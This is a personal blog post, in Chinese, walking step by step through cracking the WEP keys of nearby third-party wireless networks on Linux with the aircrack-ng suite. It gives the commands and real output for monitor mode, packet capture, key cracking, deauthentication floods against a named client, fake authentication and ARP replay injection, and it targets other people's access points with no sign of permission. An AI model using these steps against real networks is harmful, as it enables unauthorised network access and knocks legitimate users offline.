momo zone

调核人的blog

linux 下破解无线AP WEP 完全手记

事实上一开始我就走了一些弯路,以为intel的 4965卡不支持注入攻击,就直接airodump抓包破解,竟然还真的一次成功,不过后来想想这纯粹因为那个ap很活跃data增长很快。

言归正传
1,首先找适合iwl4965的破解驱动,这个是弯路之一,事实上对于intel的iwl4965 的驱动早已经在kernel 中支持,并且在2.6.26中支持注入(关于注入的类型后面有讲到)。所以不用在这里折腾了。

2,我在之前已经自己手动编译了一次kernel所以前面一篇文章说到 重新编译kernel后需要再安装compat-wireless驱动包,似乎不同版本的包对注入攻击支持程度不一样,所以这里找到一个包含历史版本的站点 http://www.orbit-lab.org/kernel/,可以多试几个。

3,去http://www.aircrack-ng.org/doku.php下载aircrack-ng 工具包 ,这个是必不可少的哦。

4,东西都准备好了(至少现在我认为基本工作都已经好了)。开始airmon-ng 启动监听模式:
airmon-ng start wlan0
居然runtime error :
"Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http: //dl.aircrack-ng.org/iw.tar.bz2"
看来还是缺一个包,没办法去下吧 。其实这个工具和compat-wireless中的iwconfig一样,不过这里airmon-ng只依赖后者。

5,启动监听后出现新的接口 mon0 , 这个接口最神奇的是可以完全和wlan0 独立,基于该接口的操作不会影响到wlan0(理论上是这样,但对于4965似乎在频道切换上还是有影响的,下文有提到)

6,airodump-ng mon0 开始捕包看看有哪些 ap,哦看到不少哦,很多是没有加密的,不过这些没有加密的已经被蹭的差不多了,没有利用价值。这里对信号最强的也是最活跃的一个下手。

 CH  6 ][ Elapsed: 8 s ][ 2009-05-17 11:45

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1C:F0:40:FB:F4  -90   0        2        0    0   6  54   WPA2 TKIP   PSK  sting
 00:23:CD:68:70:52   -1   0        0        9    0 133  -1   OPN              <length:  0>
 00:21:27:65:4B:1E  -89   0        3        0    0   6  54 . OPN              TP-LINK_654B1E
 00:21:27:65:5A:14  -89   0        8        1    0   6  54 . WEP  WEP         TP-LINK_655A14
 00:1D:0F:2C:95:24  -58   3       87        3    0   6  54 . WEP  WEP         sis
 00:14:78:EA:22:24  -80   2       87       32    3   6  54 . OPN              TP-LINK

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

 00:23:CD:68:70:52  00:0F:66:E7:4B:39  -89   0- 6      1        9
 00:21:27:65:5A:14  00:1B:77:D8:50:41   -1   1- 0      0        1
 00:1D:0F:2C:95:24  00:13:E8:13:AC:A9    0  54-54      0        4
 00:14:78:EA:22:24  00:13:02:CF:5D:19  -77   0-24    191       61
,m
重新运行airodump-ng -c 6 -w sis  –bssid 00:1D:0F:2C:95:24 mon0
写入文件 sisXXXX (XXXX) 的部分,airodump-ng自动填充。不一会data数量已经1W 了

7,新开sh窗口开始破解 aircrack-ng -z sis*.cap
这里 -z 参数表示用新的pwt方式进行破解,原来需要20W个包才能破解的密码,现在只要2W个。
不过这次1W就够了,这个ap的密码实在太简单了,1W 就破了。

8,当然破解这类不需要注入攻击的ap实在没有什么挑战性。下面要破解那些“被浪费”的ap(几乎没人用,也没有data)。对于注入攻击比较复杂,主要用aireplay-ng来实现。该工具所支持的注入攻击有如下几种方式:

现用Attack 9: Injection test 测试一下:
aireplay-ng -9 mon0
12:30:56  Trying broadcast probe requests…
12:30:56  Injection is working!
12:30:58  Found 2 APs

ok,这样就可以了。

9,先试地一种:

aireplay-ng -0 1 -a 00:21:27:65:5A:14 -c 00:1B:77:D8:50:41 mon0

这种攻击主要是获得一下效果

  • Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
  • Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
  • Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

这里第三点是最主要的。
aireplay-ng -0 10  -a 00:14:78:EA:22:24  -c 00:1B:77:D8:50:41   mon0
12:48:24  Waiting for beacon frame (BSSID: 00:14:78:EA:22:24) on channel 6
12:48:25  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|42 ACKs]
12:48:26  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|57 ACKs]
12:48:34  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|397 ACKs]
12:48:44  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|456 ACKs]
12:48:54  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|480 ACKs]
12:49:04  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|456 ACKs]
12:49:14  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|474 ACKs]
12:49:23  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|458 ACKs]
12:49:34  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|80 ACKs]
12:49:49  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|262 ACKs]
不过这种攻击方式与破解密码无关!

10,对于-1 的攻击方式,很遗憾在4965上是不被支持的:

aireplay-ng -1 0 -e sis -a 00:1D:0F:2C:95:24 -h 00:13:E8:13:AC:A9 mon0

13:40:23  Sending Authentication Request (Open System)

13:40:26  Sending Authentication Request (Open System)

13:40:29  Sending Authentication Request (Open System)

13:40:32  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn’t support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You’re too far from the AP. Get closer, or lower
      the transmit rate.

11, 下面使用-3攻击方式,这才是目前发现的对于4965最有效的攻击方式,尽管不是最快的。

前提是要有一个授权的主机已经连上了目标ap,然后用aireplay-ng -3 -b 00:1D:0F:2C:95:24 mon0
监听ARP,待已授权的主机向ap发出arp request的时候,aireplay截获,并重新发送该包,ap会被欺骗并返回arp ack 这个时候airodump 的data会上涨,等到2W的时候拿去破吧 。

Advertisements

发表评论

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / 更改 )

Twitter picture

You are commenting using your Twitter account. Log Out / 更改 )

Facebook photo

You are commenting using your Facebook account. Log Out / 更改 )

Google+ photo

You are commenting using your Google+ account. Log Out / 更改 )

Connecting to %s

%d 博主赞过: